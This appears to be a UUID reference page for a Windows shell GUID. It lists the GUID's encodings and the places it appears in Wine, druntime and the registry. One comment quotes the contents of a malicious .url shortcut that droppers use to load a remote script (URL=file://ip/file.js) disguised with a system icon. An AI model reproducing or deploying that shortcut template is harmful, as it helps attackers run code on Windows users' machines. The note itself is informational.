Version | None |
Variant | reserved for Microsoft compatibility |
urn | urn:uuid:000214a0-0000-0000-c000-000000000046 |
Hexdump | 000214a000000000c000000000000046 |
Bytes | ␀␂␔á␀␀␀␀└␀␀␀␀␀␀F |
Not an RFC4122 UUID actually | The version bits aren't corretly set. |
Alternative encoding | a0140200-0000-0000-c000-000000000046 |
Alternative encoding | a0140200-0000-0000-0000-00c046000000 |
(would-be) MAC Address | 000000000046 |
(would-be) is_local bit | False |
(would-be) is_multicast bit | False |
(would-be) MAC Manufacturer | 00:00:00 |
(would-be) MAC Date | 2000-09-08, deepmac.org, 000000/24 |
from dlang/druntime/master/src/core/sys/windows/uuid.d
some malware droppers are including the following in a .url text file to leverage Microsoft Windows remote code execution features. [{000214A0-0000-0000-C000-000000000046}] Prop3=19,9 [InternetShortcut] URL=file://ip/file.js IconFile=C:\Windows\system32\shell32.dll IconIndex=46 IDList= HotKey=0
Wine 1.1.10 includes file: shlguid.h from Mikołaj Zalewski's http://mikolajapp2.appspot.com - wine11.xml
Windows SDK 6.0 file: ShlGuid.h from Mikołaj Zalewski's http://mikolajapp2.appspot.com - wdk6.xml
Windows Vista Registry object: reg-subkey name: None key: HKLM\SOFTWARE\Classes\CLSID\{06EEE834-461C-42c2-8DCF-1502B527B1F9}\Instance\PropertySetStorage from Mikołaj Zalewski's http://mikolajapp2.appspot.com - reg-vista.xml
from the wine source code
"[{000214A0-0000-0000-C000-000000000046}]\n" in ./dlls/ieframe/tests/intshcut.c:312
"[{000214A0-0000-0000-C000-000000000046}]\n" in wine/dlls/ieframe/tests/intshcut.c:312
THIS IS GRET